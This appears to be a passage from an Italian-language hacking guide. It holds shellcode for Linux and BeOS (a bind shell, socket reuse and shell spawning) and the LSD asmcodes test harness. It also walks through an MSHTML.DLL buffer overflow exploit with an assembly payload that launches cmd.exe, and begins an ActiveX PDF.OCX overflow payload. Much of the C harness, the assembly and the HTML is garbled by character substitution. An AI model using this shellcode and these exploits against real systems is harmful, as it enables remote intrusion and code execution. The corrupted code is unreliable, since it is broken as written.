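    "\x31\xdb"             /* xorl    %ebx,%ebx              */
    "\x89\xe7"             /* movl    %esp,%edi              */
    "\x8d\x77\x10"         /* leal    0x10(%edi),%esi        */
    "\x89\x77\x04"         /* movl    %esi,0x4(%edi)         */
    "\x8d\x4f\x20"         /* leal    0x20(%edi),%ecx        */
    "\x89\x4f\x08"         /* movl    %ecx,0x8(%edi)         */
    "\xb3\x10"             /* movb    $0x10,%bl              */
    "\x89\x19"             /* movl    %ebx,(%ecx)            */
    "\x31\xc9"             /* xorl    %ecx,%ecx              */
    "\xb1\xff"             /* movb    $0xff,%cl              */
    "\x89\x0f"             /* movl    %ecx,(%edi)            */
    "\x51"                 /* pushl   %ecx                   */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\xb0\x66"             /* movb    $0x66,%al              */
    "\xb3\x07"             /* movb    $0x07,%bl              */
    "\x89\xf9"             /* movl    %edi,%ecx              */
    "\xcd\x80"             /* int     $0x80                  */
    "\x59"                 /* popl    %ecx                   */
    "\x31\xdb"             /* xorl    %ebx,%ebx              */
    "\x39\xd8"             /* cmpl    %ebx,%eax              */
    "\x75\x0a"             /* jne     <findsckcode+54>       */
    "\x66\xb8\x12\x34"     /* movw    $0x1234,%ax            */
    "\x66\x39\x46\x02"     /* cmpw    %ax,0x2(%esi)          */
    "\x74\x02"             /* je      <findsckcode+56>       */
    "\xe2\xe0"             /* loop    <findsckcode+24>       */
    "\x89\xcb"             /* movl    %ecx,%ebx              */
    "\x31\xc9"             /* xorl    %ecx,%ecx              */
    "\xb1\x03"             /* movb    $0x03,%cl              */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\xb0\x3f"             /* movb    $0x3f,%al              */
    "\x49"                 /* decl    %ecx                   */
    "\xcd\x80"             /* int     $0x80                  */
    "\x41"                 /* incl    %ecx                   */
    "\xe2\xf6"             /* loop    <findsckcode+62>       */
;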
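/* Linux/x86 bind-socket via socketcall (0x66): socket=1, bind=2 to the port
 * inside the pushed 0x341202ff word (patched at BINDSCKPORTOFS=6,7),
 * listen=4, accept=5, then dup2 (0x3f) the client onto 2,1,0.
 * The stored argument is written at 0xc(%esp) (byte 0x0c). */
char bindsckcode[]=        /* 73 bytes                       */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68\xff\x02\x12\x34" /* pushl   $0x341202ff            */
    "\x89\xe7"             /* movl    %esp,%edi              */
    "\x50"                 /* pushl   %eax                   */
    "\x6a\x01"             /* pushb   $0x01                  */
    "\x6a\x02"             /* pushb   $0x02                  */
    "\x89\xe1"             /* movl    %esp,%ecx              */
    "\xb0\x66"             /* movb    $0x66,%al              */
    "\x31\xdb"             /* xorl    %ebx,%ebx              */
    "\x43"                 /* incl    %ebx                   */
    "\xcd\x80"             /* int     $0x80                  */
    "\x6a\x10"             /* pushb   $0x10                  */
    "\x57"                 /* pushl   %edi                   */
    "\x50"                 /* pushl   %eax                   */
    "\x89\xe1"             /* movl    %esp,%ecx              */
    "\xb0\x66"             /* movb    $0x66,%al              */
    "\x43"                 /* incl    %ebx                   */
    "\xcd\x80"             /* int     $0x80                  */
    "\xb0\x66"             /* movb    $0x66,%al              */
    "\xb3\x04"             /* movb    $0x04,%bl              */
    "\x89\x44\x24\x0c"     /* movl    %eax,0xc(%esp)         */
    "\xcd\x80"             /* int     $0x80                  */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x83\xc4\x0c"         /* addl    $0x0c,%esp             */
    "\x50"                 /* pushl   %eax                   */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\x66"             /* movb    $0x66,%al              */
    "\x43"                 /* incl    %ebx                   */
    "\xcd\x80"             /* int     $0x80                  */
    "\x89\xc3"             /* movl    %eax,%ebx              */
    "\x31\xc9"             /* xorl    %ecx,%ecx              */
    "\xb1\x03"             /* movb    $0x03,%cl              */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\xb0\x3f"             /* movb    $0x3f,%al              */
    "\x49"                 /* decl    %ecx                   */
    "\xcd\x80"             /* int     $0x80                  */
    "\x41"                 /* incl    %ecx                   */
    "\xe2\xf6"             /* loop    <bindsckcode+63>       */
;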
#define FINDSCKPORTOFS 46
#define BINDSCKPORTOFS 06
#endif
BeOS/x86 codes, file: x86-beos
/*
syscall     %eax stack
----------- ---- ---------------------------------------------------------------
execv       0x03f ret,anum=1,->[->path="/bin//sh"],0
execv       0x03f ret,anum=3,->[->path="/bin//sh",->a1="-c",->a2=cmd],0
*/
#if defined(X86) && defined(BEOS)
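/* BeOS/x86: execv("/bin//sh") through int $0x25 (syscall 0xa2, one arg). */
char shellcode[]=          /* 25 bytes                       */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x54"                 /* pushl   %esp                   */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x6a\x01"             /* pushb   $0x01                  */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\xa2"             /* movb    $0xa2,%al              */
    "\xcd\x25"             /* int     $0x25                  */
;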
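/* BeOS/x86: execv("/bin//sh","-c",cmd) through int $0x25 (syscall 0xa2,
 * three args); the command is appended after the final call. */
char cmdshellcode[]=       /* 44+cmdlen bytes                */
    "\xeb\x25"             /* jmp     <cmdshellcode+39>      */
    "\x59"                 /* popl    %ecx                   */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x66\x68""-c"         /* pushw   $0x632d                */
    "\x89\xe7"             /* movl    %esp,%edi              */
    "\x51"                 /* pushl   %ecx                   */
    "\x57"                 /* pushl   %edi                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x6a\x03"             /* pushb   $0x03                  */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\xa2"             /* movb    $0xa2,%al              */
    "\xcd\x25"             /* int     $0x25                  */
    "\xe8\xd6\xff\xff\xff" /* call    <cmdshellcode+2>       */
    /* command */
;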
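/* x86 stack-pointer retrieval: returns %esp in %eax. */
char jump[]=
    "\x8b\xc4"             /* movl    %esp,%eax              */
    "\xc3"                 /* ret                            */
;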
#endif
Programma d'esempio legato all'uso dei codici
(1) asmcodes.h
#ifndef ASMCODES_H
#define ASMCODES_H
#include "mips-irix"
#include "sparc-solaris"
#include "parisc-hpux"
#include "powerpc-aix"
#include "alpha-ultrix"
#include "x86-beos"
#include "x86-bsd"
#include "x86-linux"
#include "x86-solaris"
#include "x86-sco"
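/* Table of the code blocks available on the platform being compiled, indexed
 * by the SYSCALL..BIND constants below.  Slots a platform does not implement
 * hold { "", NULL }; the array is sized 9 so the unused tail is zeroed and
 * main()'s listing loop can test .n for NULL. */
typedef struct{char *n;char *c;}asmcodes_t[9];
asmcodes_t asmcodes={
#if defined(AIX) || ( defined(X86) && ( defined(SOLARIS) || defined(SCO) ) )
    { "syscallcode", syscallcode },
#else
    { "", NULL },
#endif
    { "shellcode", shellcode },
    { "cmdshellcode", cmdshellcode },
#if !defined(BEOS) && !defined(ULTRIX)
#if defined(SOLARIS) || defined(SCO) || defined(LINUX) || defined(BSD)
    { "setuidcode", setuidcode },
#endif
#if defined(HPUX)
    { "setresuidcode", setresuidcode },
#endif
#if defined(IRIX) || defined(AIX)
    { "setreuidcode", setreuidcode },
#endif
    { "chrootcode", chrootcode },
#if !defined(OPENSERVER)
    { "findsckcode", findsckcode },
#else
    { "", NULL },
#endif
#if !defined(SCO)
    { "bindsckcode", bindsckcode }
#else
    { "", NULL },
#endif
#else
    { "", NULL },
    { "", NULL },
    { "", NULL },
    { "", NULL }
#endif
};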
#if defined(BEOS) || defined(ULTRIX)
#define FINDSCKPORTOFS -1
#define BINDSCKPORTOFS -1
#define usleep(a) sleep(1)
#endif
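/* Block selectors: bit positions in the `flags` word built by parseblocks()
 * and tested by main() (is/block both read the local `flags`).  _REMOTE is
 * only ever used as a flag bit, never as an index into asmcodes[]; its
 * leading-underscore name is reserved by the C standard but kept here
 * because asmcodes.c refers to it. */
#define is(flag) (flags&(1<<flag))
#define block(flag) (flags&(1<<flag))
#define code(flag) asmcodes[flag].c
#define SYSCALL 0
#define SHELL 1
#define CMD 2
#define CRED 3
#define CHROOT 4
#define FIND 5
#define BIND 6
#define _REMOTE 9
/* Grammar for the -b option: a block letter, the letters that may follow
 * it, and the flags it turns on. */
typedef struct{char state;char *follow;int flag;}pblock_t[4];
pblock_t tab={
    { 'P', "CSRFB", (1<<CRED) },
    { 'R', "CSFB" , (1<<CHROOT) },
    { 'F', "CS"   , (1<<FIND)|(1<<_REMOTE) },
    { 'B', "CS"   , (1<<BIND)|(1<<_REMOTE) }
};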
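/* Parse a -b block string such as "PRFS" into a flags word.
 * Every character but the last must be a state letter in tab[] whose
 * successor appears in its follow list; the last character must be S (shell)
 * or C (command).  Returns the OR of the selected flags, or -1 on any
 * violation (an empty string also yields -1 because c stays 0). */
int parseblocks(char *b){
    char c=0;int i,flag=0;
    while((c=*b++)&&*b){
        for(i=0;i<4;i++) if(c==tab[i].state) break;
        if(i==4) return(-1);
        if(strchr(tab[i].follow,*b)) flag|=tab[i].flag; else return(-1);
    }
    if(c=='S') flag|=(1<<SHELL);
    else if(c=='C') flag|=(1<<CMD); else return(-1);
    return(flag);
}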
#endif
(2) asmcodes.c
/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland *://lsd-pl.net/ #*/
/*## unix asmcodes testing facility #*/
/* this code provides the capability of testing different assembly code */
/* blocks in proof of concept codes */
/* */
/* compilation: */
/* (g)cc asmcodes.c -DSYSTEM -DPROCESSOR [-DVERSION] [-lnsl -lsocket] */
/* platforms: files: */
/* -DIRIX -DMIPS ; mips-irix */
/* -DSOLARIS -DSPARC ; sparc-solaris */
/* -DHPUX -DPARISC ; parisc-hpux */
/* -DAIX -DPOWERPC -DV41|-DV42|-DV43 ; powerpc-aix */
/* -DULTRIX -DALPHA ; alpha-ultrix */
/* -DSOLARIS -DX86 ; x86-solaris */
/* -DBEOS -DX86 ; x86-beos */
/* -DLINUX -DX86 ; x86-linux */
/* -DOPENBSD -DX86 ; x86-bsd */
/* -DFREEBSD -DX86 ; x86-bsd */
/* -DNETBSD -DX86 ; x86-bsd */
/* -DOPENSERVER -DX86 ; x86-sco */
/* -DUNIXWARE -DX86 ; x86-sco */

#include <sys/types.h>
#include <sys/socket.h>
#if defined(AIX)
#include <sys/select.h>
#endif
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include "_asmcodes.h"
int main(int argc,char --arg?))
char buffer.,0!C/,-b,-cmdKidK;
int i,c,n,flags-,,*ort,!BC,sck;
struct hostent -h*;
struct sockaddr'in adr;
*rintf(Kco*>right =165 651I4 72 F4=I:I<; feb !00, *oland //lsd-*l.net/OnK);
*rintf(Kunix asmcodes testing facilit>OnOnK);
Ehile((cgeto*t(argc,arg?,KbGcG*GK))T-,))
sEitch(c))
case YbYG flags*arseblocks(o*targ);break;
case YcYG cmdo*targ;break;
case Y*YG *ortatoi(o*targ);break;
0
0
if(flags-,))
*rintf(KusageG Js -b buffer .-* *ort/ .-c OKcmdOK/OnJsK,arg?.0/,
K Ehere the buffer is com*osed of one of the folloEing blocksGOnK
K 6 interacti?e shellOnK
K 8 single command (-c OKcmdOK, or *redefined OKidOK)OnK
K @ restore *ri?ilegesOnK
K : esca*e chroot %ailOnK
K 2 find socket (-* *ort, or default,!BC)OnK
K A bind socket (same as for 2)OnOnK
K ?alid blocks combinationsGOnK
K 6 @6 :6 @:6 26 A6 @26 @A6 :26 :A6 @:26 @:A6OnK
K 8 @8 :8 @:8 28 A8 @28 @A8 :28 :A8 @:28 @:A8OnOnK
K blocks im*lemented on this *latformGOn K
);
for(i,;iQM;iNN) *rintf(KJs K,asmcodes.i/.nZasmcodes.i/.nGKK);
*rintf(KOnOn exam*leG Js -b @:26 -* ,,,!OnK,arg?.0/);
exit(-,);
0
/*
 * if the find or bind codes are to be tested run simple network daemon
 * simulating a vulnerable application. the simulation is done by the means
 * of reading instructions stream from the network and then executing it.
 */
if(is(':4;754)))
if(Tfork()))
scksocket(12'I345,6789'65:41;,0);
adr.sin'famil>12'I345;
adr.sin'*orthtons(*ort);
adr.sin'addr.s'addrhtonl(I31FF:'13X);
i,;
setsocko*t(sck,67='678945,67':4<641FF:,(?oid-)+i,si&eof(i));
if(bind(sck,(struct sockaddr-)+adr,si&eof(struct sockaddr'in))Q0))
*error(KerrorK);exit(-,);
0
listen(sck,,);
if((iacce*t(sck,(struct sockaddr-)0,(int-)0))-,) exit(-,);
close(sck);scki;
read(sck,buffer,si&eof(buffer));
uslee*("00000);
if(block(AI3F)) close(sck);
Hif defined(1IL)
)
int %um*.!/)(int)buffer,-((int-)+mainN,)0;
slee*(,);
((-(?oid (-)())%um*)());
0
Helse
uslee*(,00000);
((-(?oid (-)())buffer)());
Hendif
exit(-,);
0
slee*(,);
0
/-
- if this is remote code test, connect to the remote ser?er, Ehich
- simulates ?ulnerable a*lication.
-/
if(is(':4;754)))
scksocket(12'I345,6789'65:41;,0);
adr.sin'famil>12'I345;
adr.sin'*orthtons(*ort);
if((adr.sin'addr.s'addrinet'addr(K,!#.0.0.,K))-,))
if((h*gethostb>name(K,!#.0.0.,K))3<==))
errno41FF:3751S1I=;*error(KerrorK);exit(-,);
0
memc*>(+adr.sin'addr.s'addr,h*-$h'addr,C);
0
if(connect(sck,(struct sockaddr-)+adr,si&eof(struct sockaddr'in))Q0))
*error(KerrorK);exit(-,);
0
0
/-
- se*arate code *ieces are combined into one block in the target buffer.
- for the findsckcode the local *ort of the connection established Eith
- a K?ulnerableK ser?er must be obtained. for bindsckcode the number
- of *ort to Ehich the listening socket is to be bound must be s*ecified.
-/
bbuffer;
if(code(6X681==)T3<==))
for(i0;iQstrlen(code(6X681==));iNN) -bNNcode(6X681==).i/;
0
if(block(8:4F)))
for(i0;iQstrlen(code(8:4F));iNN) -bNNcode(8:4F).i/;
0
if(block(8U:775)))
for(i0;iQstrlen(code(8U:775));iNN) -bNNcode(8U:775).i/;
0
if(block(2I3F)))
isi&eof(struct sockaddr'in);
if(getsockname(sck,(struct sockaddr-)+adr,+i)-,))
struct)unsigned int maxlen;unsigned int len;char -buf;0nb;
ioctl(sck,((Y6YQQD)W!),KsockmodK);
nb.maxlen0xffff;
nb.lensi&eof(struct sockaddr'in);;
nb.buf(char-)+adr;
ioctl(sck,((Y5YQQD)W,CC),+nb);
0
nntohs(adr.sin'*ort);
code(2I3F).2I3F689@7:5726N0/(unsigned char)((n$$D)+0xff);
code(2I3F).2I3F689@7:5726N,/(unsigned char)(n+0xff);
for(i0;iQstrlen(code(2I3F));iNN) -bNNcode(2I3F).i/;
0
if(block(AI3F)))
n*ort;
code(AI3F).AI3F689@7:5726N0/(unsigned char)((n$$D)+0xff);
code(AI3F).AI3F689@7:5726N,/(unsigned char)(n+0xff);
for(i0;iQstrlen(code(AI3F));iNN) -bNNcode(AI3F).i/;
0
if(block(6U4==)))
for(i0;iQstrlen(code(6U4==));iNN) -bNNcode(6U4==).i/;
0
if(block(8;F)))
for(i0;iQstrlen(code(8;F));iNN) -bNNcode(8;F).i/;
for(i0;iQstrlen(cmd);iNN) -bNNcmd.i/;
0
-b0;
/-
- the *ortion of code simulating a K?ulnerabilit>K in a *rogram, Ehich
- is to be ex*loited locall>
-/
if(Tis(':4;754)))
Hif defined(1IL)
)
int %um*.!/)(int)+buffer,-((int-)+mainN,)0;
slee*(,);
((-(?oid (-)())%um*)());
0
Helse
Hif defined(<=5:IL)
((-(?oid (-)())(unsigned long long)strdu*(buffer))());
Helse
uslee*(,00000);
((-(?oid (-)())buffer)());
Hendif
Hendif
exit(-,);
0
/-
- for remote test, send buffer ?ia netEork socket to a sim*le daemon.
- do bind reconnection Ehereas needed. if remote shell gets executed,
- read commands from user, feed them to the shell and shoE their results.
-/
Erite(sck,buffer,strlen(buffer)N,);
if(block(AI3F)))
close(sck);
slee*(!);
scksocket(12'I345,6789'65:41;,0);
adr.sin'*orthtons(n);
if(connect(sck,(struct sockaddr-)+adr,si&eof(struct sockaddr'in))Q0))
*error(KerrorK);exit(-,);
0
0
if(block(2I3F)))
slee*(,);
0
Erite(sck,Kuname -aOnK,M);
Ehile(,))
fd'set fds;
2F'[4:7(+fds);
2F'645(0,+fds);
2F'645(sck,+fds);
if(select(2F'6456I[4,+fds,3<==,3<==,3<==)))
int cnt;
char buf.,0!C/;
if(2F'I6645(0,+fds)))
if((cntread(0,buf,,0!C))Q,))
if(errno4V7<=FA=789WWerrno41I1I3) continue;
else break;
0
Erite(sck,buf,cnt);
0
if(2F'I6645(sck,+fds)))
if((cntread(sck,buf,,0!C))Q,))
if(errno4V7<=FA=789WWerrno41I1I3) continue;
else break;
0
Erite(,,buf,cnt);
0
0
0
exit(0);
0
Buffer Overflow in MSHTML.DLL
Indovinate dove si trova un buffer overflow?
Dentro alla DLL che gestisce l’interprete Microsoft di HTML, ovvero la DLL MSHTML.DLL.
In altre parole, se viene fornito all’interprete uno statement del tipo:
Qembed srcKfilename.1111111111Qun certo numero di Y1Y$K$
l’indirizzo di ritorno viene sovrascritto dalla conversione in UNICODE di AAAA, ovvero
0x41004100.
Il buffer overflow avviene quando l’interprete cerca di concatenare l’estensione del file con
"Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappingOverride\"
tramite la funzione C wcscat().
Esiste un altro problema nel sistema di validazione, e precisamente in quello che controlla se
esiste un’estensione.
Esistono comunque tre problemi specifici nella scrittura dell’exploit, e precisamente:
1. Tutti i dati vengono convertiti in UNICODE, e cioè le A vengono convertite in 0x0041.
2. L’indirizzo dello shellcode potrebbe essere differente in base al numero di finestre aperte.
3. Ci sono differenti offset di EIP salvati all’interno dello stack a seconda che la versione di Internet
Explorer sia precedente o posteriore a IE5.5SP2.
Il primo problema ce lo insegna a bypassare CodeRed: è sufficiente passare lo shellcode già
in UNICODE per evitare la routine di conversione.
Il secondo problema è bypassabile facendo sì che l’indirizzo che andiamo a sovrascrivere sia di
fatto quello di una routine presente in una DLL in memoria, a cui sarà possibile saltare indietro
mediante EBP o ESP.
Abbiamo trovato un’istruzione "jmp esp" (FFE4) in tutte le versioni di kernel32.dll e anche
dentro a una versione di msvcrt.dll (6.10.8924.0).
Questa versione di DLL non dipende da Internet Explorer ed è presente in qualsiasi
installazione Windows.
Il terzo problema è possibile bypassarlo mediante la sovrascrittura dei vari EIP salvati nello
stack, usando un certo numero di nop e
call xxxx
...
xxxxG
*o* eb*
Se vi ricordate, quando abbiamo parlato dei buffer overflow uno dei problemi era quello dato
dalla presenza di 0.
Qui non dobbiamo preoccuparci, in quanto il tutto è già fornito come UNICODE.
Qui di seguito è riportato uno shellcode con degli effetti visuali.
;
; matrix.asm - source code for matrix.htm
;
; buildG
; tasm matrix.asm /m!
; tlink matrix.ob%, matrix.htm /t /B
;
; 1uthorsG
; 4::7:G bug disco?er>
; B1@1B1G idea and coding
; 722linerG matrix effects and undocumented VindoEs 1@I
;
; 5hanx to 1ndre> 9olishak for indirect es* %um* idea
;
; >ou can obtain matrix screensa?er from
; htt*G//EEE.securit>.nno?.ru/matrix
;
;
; ei*%m*G o?erErites sa?ed 4I@ for all ?ersions of
; mshtml.dll
; es*%m*G gets control after %m* es* and calls code,
; code,G restores 4I@ from stack after call to eb*
; does some actions and %um*s to code!
; code!G does the rest of actions
data* eRu (Fata5ableN0D0h)
h9ernelB! eRu =oad=-data*
c8ur eRu 6tring5able-data*
6et88U eRu 6tring5ableNC-data*
Iet6U eRu 6tring5ableND-data*
6lee* eRu 6tring5ableN,!-data*
Vrite8 eRu 6tring5ableN,(-data*
1lloc8 eRu 6tring5ableN!0-data*
6et8F; eRu 6tring5ableN!C-data*
6et851 eRu 6tring5ableN!D-data*
6et88I eRu 6tring5ableNB!-data*
Vin4 eRu 6tring5ableNB(-data*
4xit@ eRu 6tring5ableNC0-data*
h6td7ut eRu 6tring5ableNCD-data*
dE7ld;ode eRu c8ur
con8ur eRu 6tring5ableN"!-data*
cls eRu 6tring5ableN"(-data*
FV3um8har eRu 6tring5ableN(0-data*
:egU9 eRu user-data*
BD(
'faked segment *ara *ublic Y87F4Y useB!
assume csG'faked
startG
'faked ends
'main segment *ara *ublic YF151Y useB!
assume csG'main
*refixG
begin db 0ffh,0feh ;<nicode *refix
db KQK,0,KeK,0,KmK,0,KbK,0,KeK,0,KdK,0,0dh,0
db KsK,0,KrK,0,KcK,0,KK,0,BC,0
db KhK,0,KtK,0,KtK,0,K*K,0,KGK,0,K/K,0,K/K,0
db KEK,0,KEK,0,KEK,0,K.K,0
db
KsK,0,KeK,0,KcK,0,KuK,0,KrK,0,KiK,0,KtK,0,K>K,0,K.K,0
db KnK,0,KnK,0,KoK,0,K?K,0,K.K,0,KrK,0,KuK,0
db K/K,0,KfK,0,KiK,0,KlK,0,KeK,0,KsK,0,K/K,0
db KiK,0,KeK,0,KbK,0,KoK,0,K/K,0,KLK,0
db KT(c)B1@1B1K
db !! du*(0M0h)
code,G
*o* eb*
mo? es*,ebx
xor eax,eax
dataoffset Fata5able - code!
eb*diff D0h N dataoffset
mo? ax,eb*diff
add eb*,eax ;eb* *oints to data

lea eax,.eb*Nuser-data*/
*ush eax
mo? ebx,.eb*N=oad=-data*/
mo? eax,.ebx/
mo? .eb*N=oad=-data*/,eax
call eax ;=oad=ibrar>1(KuserB!.dllK)
lea ebx,.eb*Nreg-data*/
*ush ebx
*ush eax
mo? ebx,.eb*NIet@1-data*/
mo? eax,.ebx/
mo? .eb*NIet@1-data*/,eax
call eax ;Iet@roc1ddress(.,K:egisterUot9e>K)
mo? .eb*N:egU9/,eax
lea edi,.eb*Nrhk-data*/
mo?&x esi,b>te *tr.edi/
=oo*Uotke>G
inc edi
xor eax,eax
mo? al,.edi/
*ush eax
inc edi
mo? al,.edi/
*ush eax
inc edi
mo? al,.edi/
*ush eax
xor eax,eax
*ush eax
call .eb*N:egU9/
dec esi
or esi,esi
%n& =oo*Uot9e>

lea eax,.eb*N6tring5able-data*/ ;string KkernelB!.dllK
*ush eax
call .eb*N=oad=-data*/ ;=oad=ibrar>1(KkernelB!.dllK)
mo? .eb*Nh9ernelB!/,eax ;h9ernelB!
lea eax, .eb*N6et88U/
mo? .eb*Nc8ur/,eax ;-c8ur 6et88U
lea edi,.eb*Nfuncnum-data*/
mo?&x esi,b>te *tr.edi/ ;esifuncnum
inc edi
=oo*:esol?eG
*ush edi
*ush dEord *tr .eb*NUkernelB!/
call .eb*NIet@1-data*/ ;Iet@roc1ddress(edi)
mo? ebx,.eb*Nc8ur/
mo? .ebx/,eax ;sa?e func address
xor ecx,ecx
mo? cl,C
add ebx,ecx
mo? .eb*Nc8ur/,ebx ;c8urNC
not ecx
xor eax,eax
re*n& scasb ;find O0
dec esi
or esi,esi
%n& =oo*:esol?e

call .eb*N1lloc8/ ;1lloc8onsole()
*ush eax ;non&ero if succeed
xor eax,eax
*ush eax
call .eb*N6et88U/ ;6et8onsole8trlUandler(3<==,5:<4)
xor eax,eax
not eax
sub al,01h
*ush eax
call .eb*NIet6U/ ;Iet6tdUandle(65F'7<5@<5'U13F=4)
mo? .eb*Nh6td7ut/,eax ;h6td7ut
lea eax,.eb*NdE7ld;ode/
*ush eax
xor ebx,ebx
inc ebx
*ush ebx
*ush dEord *tr .eb*Nh6td7ut/
call .eb*N6et8F;/ ;6et8onsoleFis*la>;ode(h6td7ut, ,,
+dE7ld;ode)
xor ebx,ebx
mo? bl,01h
*ush ebx
*ush dEord *tr .eb*Nh6td7ut/
call .eb*N6et851/
;6et8onsole5ext1ttribute(h6td7ut,27:4I:7<3F'I35436I5XW
27:4I:7<3F'I:443)
xor ebx,ebx
mo? .eb*N8on8urNC/,ebx ;8on8ur.bSisible ,00
mo? bl, ,00
mo? .eb*N8on8ur/,ebx ;8on8ur.dE6i&e 0
lea eax, .eb*N8on8ur/
*ush eax
*ush dEord *tr .eb*Nh6td7ut/
call .eb*N6et88I/ ;6et8onsole8ursorInfo(hstd7ut,+8on8ur)
xor eax,eax
mo? ax,,000
*ush eax
call.eb*N6lee*/ ;6lee*(,000);
xor ebx,ebx
mo? bl, string-data*
mo? eax,eb*
add eax,ebx
mo? .eb*Nc8ur/,eax ;c8ur string
mo? eax,eb*
mo? bx,data*-em*t>'string
sub eax,ebx
mo? .eb*Ncls/,eax ;set address of em*t>'string
=77@,G ;do do
xor eax,eax
*ush eax
lea ebx,.eb*NFV3um8har/
*ush ebx
inc eax
*ush eax
mo? eax,.eb*Nc8ur/
*ush eax
*ush dEord *tr .eb*Nh6td7ut/
call .eb*NVrite8/
;Vrite8onsole(h6td7ut,(?oid-)c8ur,,,+FV3um8har,3<==);
xor eax,eax
mo? al,,00
mo? ecx,.eb*Nc8ur/
mo? bl,.ecx/
sub bl,!0
%n& 3,
mo? ax,C00
3,G mo? bl,.ecx/
sub bl,D
%n& 3!
mo? ax,!,00
3!G *ush eax
call .eb*N6lee*/ ;6lee*((-c8urY Y)ZC00G(-c8urYObY)Z
!,00G,00)
mo? ecx,.eb*Nc8ur/
inc ecx
mo? .eb*Nc8ur/,ecx ;NNc8ur
mo? bl,.ecx/
sub bl,M
%n& =77@, ;Ehile(-c8urTYOtY);
call .eb*Ncls/
mo? ecx,.eb*Nc8ur/
inc ecx
mo? .eb*Nc8ur/,ecx ;NNc8ur
mo? bl,.ecx/
sub bl,001h
%n& =77@, ;Ehile(-c8urTYOnY);
inc ecx
xor eax,eax
*ush eax
lea ebx,.eb*NFV3um8har/
*ush ebx
mo? al,,D
*ush eax
*ush ecx
*ush dEord *tr .eb*Nh6td7ut/
%m* code!

codelength P - begin
neednoo*s ,dCh - codelength
db neednoo*s du*(0M0h)
ei*%m*G
dd #D0!Ce0!h
dd #D0!Ce0!h
dd #D0!Ce0!h
dd #D0!Ce0!h
dE M0M0h
dd #D0!Ce0!h ;4I@ for I4 Q ""6@!
es*%m*G
db ,D du*(0M0h)
xor eax,eax ;46@ comes here
mo? ax,0,#0h
mo? ebx,es*
sub ebx,eax
call ebx
code!G
call .eb*NVrite8/
xor eax,eax
mo? ax,C000
*ush eax
call .eb*N6lee*/
call .eb*Ncls/
lea eax,.eb*Ncmdexe-data*/
*ush eax
*ush eax
call .eb*NVin4/
xor eax,eax
*ush eax
call .eb*N4xit@/

em*t>'stringG
; some code can be *asted here
xor eax,eax
mo? ax,,000
*ush eax
call .eb*N6lee*/ ;6lee*(,000)
xor eax,eax
*ush eax
lea ebx,.eb*NFV3um8har/
*ush ebx
mo? al,B0
*ush eax
lea eax,.eb*Nem*t>-data*/
*ush eax
*ush dEord *tr .eb*Nh6td7ut/
call .eb*NVrite8/
ret

Fata5ableG
=oad= dd #D0BB0d0h ;=oad=ibrar>1 im*ort table entr>
Iet@1 dd #D0BB0cch ;Iet@roc1ddress im*ort table entr>
6tring5ableG
db KkernelB!.dllK,0
funcnum db ,0
db K6et8onsole8trlUandlerK,0
db KIet6tdUandleK,0
db K6lee*K,0
db KVrite8onsole1K,0
db K1lloc8onsoleK,0
db K6et8onsoleFis*la>;odeK,0
db K6et8onsole5ext1ttributeK,0
db K6et8onsole8ursorInfoK,0
db KVin4xecK,0
db K4xit@rocessK,0
user db KuserB!.dllK,0
reg db K:egisterUot9e>K,0
cmdexe db Kcmd.exeK,0
rhk db "
db M,,,,00,0,bh,,,,0,,,B,,,,0!,0"dh,D,,0B,B,!,,0C
em*t> db 00dh,!D du*(0!0h),00dh,0
string db 00dh,K Vake <*, 3eo...K,00dh,00Mh,0
db 00dh,K 5he ;atrix has >ou...K,00dh,00Mh,0
db 00dh,K 2olloE the Vhite
:abbit.K,00dh,00Dh,00Mh,00ah,0
db 00dh,K 9nock, knock...K,00dh,0

*adding db B!
suffixG
db BC,0,K$K,0,00ah
co*> db K(c) !00! b> B1@1B1, 4::or, 722=inerK
'main ends
end start
Buffers Overflow a vari componenti di Windows
Esistono diversi OCX in ambiente WINDOWS che possiedono dei bug che li rendono
suscettibili di buffer overflow.
Acrobat Control for ActiveX - PDF.OCX (v1.3.188)
Setupctl 1.0 Type Library - SETUPCTL.DLL (v1, 1, 0, 6)
EYEDOG OLE Control module - EYEDOG.OCX (v1.1.1.75)
MSN ActiveX Setup BBS Control - SETUPBBS.OCX (v4.71.0.10)
hhopen OLE Control Module - HHOPEN.OCX (v1, 0, 0, 1)
RegWizCtrl 1.0 Type Library - REGWIZC.DLL (v3, 0, 0, 0)
I vari exploit sono relativi a codici HTML, quindi fate voi a fantasia.
Negli esempi quello che si esegue è il solito calcolatore.
PDF
Hob0ect classidI?clsid(+1"1@F"7C:"73C99+FC1:83C888<<;<87777?
idI?pdf?JHKob0ectJ
Hscript languageI?L>script?JHMCC
msgbo*.?1dobe 1crobat 6+! >uffer 6verrun? N +hr.97/ N ?Aritten b= &hane
4ird?/
e*pstr I
?1111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
111111111111111111111111?
e*pstr I e*pstr N +hr.:;</ O1ddress in &4)LL;:B Ain@" .FF37;<)>/ of PM% )&%
